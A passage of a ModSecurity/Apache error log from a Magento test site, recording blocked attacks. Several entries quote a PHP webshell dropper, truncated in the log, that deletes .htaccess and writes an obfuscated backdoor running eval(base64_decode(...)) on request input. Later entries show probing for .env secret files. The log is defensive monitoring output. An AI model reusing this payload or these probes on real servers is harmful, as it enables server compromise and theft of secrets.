409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.phar"] [unique_id "abG6jFoSOHKOrUx98OiHwgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:08.868057 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.phar"] [unique_id "abG6jFoSOHKOrUx98OiHwgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:08.868222 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.phar"] [unique_id "abG6jFoSOHKOrUx98OiHwgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:09.150370 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: rx88364f428d25.php8 found within FILES:custom_attributes[country_id]: rx88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "abG6jVoSOHKOrUx98OiHwwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/x/rx88364f428d25.phar
[Wed Mar 11 19:55:09.150881 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "abG6jVoSOHKOrUx98OiHwwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/x/rx88364f428d25.phar
[Wed Mar 11 19:55:09.151034 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "abG6jVoSOHKOrUx98OiHwwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/r/x/rx88364f428d25.phar
[Wed Mar 11 19:55:09.540212 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Rule 7fdc93258be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.php8"] [unique_id "abG6jVoSOHKOrUx98OiHxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:09.540556 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.php8"] [unique_id "abG6jVoSOHKOrUx98OiHxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:09.542065 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.php8"] [unique_id "abG6jVoSOHKOrUx98OiHxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Mar 11 19:55:09.542221 2026] [:error] [pid 2618365] [client 46.149.66.101:54030] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/r/x/rx88364f428d25.php8"] [unique_id "abG6jVoSOHKOrUx98OiHxAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:25.980013 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Rule 7f7efc1ffbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.phar"] [unique_id "abMfzWeEO-tR6eFgwSeowAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:25.980382 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.phar"] [unique_id "abMfzWeEO-tR6eFgwSeowAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:25.981878 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.phar"] [unique_id "abMfzWeEO-tR6eFgwSeowAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:25.982020 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.phar"] [unique_id "abMfzWeEO-tR6eFgwSeowAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:26.250070 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: jp88364f428d25.php8 found within FILES:custom_attributes[country_id]: jp88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "abMfzmeEO-tR6eFgwSeowQAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/p/jp88364f428d25.phar
[Thu Mar 12 21:19:26.250564 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "abMfzmeEO-tR6eFgwSeowQAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/p/jp88364f428d25.phar
[Thu Mar 12 21:19:26.250704 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "abMfzmeEO-tR6eFgwSeowQAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/p/jp88364f428d25.phar
[Thu Mar 12 21:19:26.853131 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Rule 7f7efc1ffbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.php8"] [unique_id "abMfzmeEO-tR6eFgwSeowgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:26.853466 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.php8"] [unique_id "abMfzmeEO-tR6eFgwSeowgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:26.855002 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.php8"] [unique_id "abMfzmeEO-tR6eFgwSeowgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 12 21:19:26.855160 2026] [:error] [pid 2656565] [client 46.149.66.101:45956] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/p/jp88364f428d25.php8"] [unique_id "abMfzmeEO-tR6eFgwSeowgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Mar 15 10:46:53.730766 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abaADWAJ710PJa37ZB3ySQAAAAM"]
[Sun Mar 15 10:46:53.731635 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abaADWAJ710PJa37ZB3ySQAAAAM"]
[Sun Mar 15 10:46:53.731778 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "abaADWAJ710PJa37ZB3ySQAAAAM"]
[Sun Mar 15 10:46:53.754132 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "abaADWAJ710PJa37ZB3ySgAAAAM"]
[Sun Mar 15 10:46:53.754395 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "abaADWAJ710PJa37ZB3ySgAAAAM"]
[Sun Mar 15 10:46:53.754554 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "abaADWAJ710PJa37ZB3ySgAAAAM"]
[Sun Mar 15 10:46:53.777152 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abaADWAJ710PJa37ZB3ySwAAAAM"]
[Sun Mar 15 10:46:53.777339 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abaADWAJ710PJa37ZB3ySwAAAAM"]
[Sun Mar 15 10:46:53.777460 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abaADWAJ710PJa37ZB3ySwAAAAM"]
[Sun Mar 15 10:46:53.799117 2026] [authz_core:error] [pid 2708247] [client 185.177.72.49:29874] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sun Mar 15 10:46:53.821556 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "abaADWAJ710PJa37ZB3yTQAAAAM"]
[Sun Mar 15 10:46:53.821840 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "abaADWAJ710PJa37ZB3yTQAAAAM"]
[Sun Mar 15 10:46:53.822002 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "abaADWAJ710PJa37ZB3yTQAAAAM"]
[Sun Mar 15 10:46:53.844060 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "abaADWAJ710PJa37ZB3yTgAAAAM"]
[Sun Mar 15 10:46:53.844258 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "abaADWAJ710PJa37ZB3yTgAAAAM"]
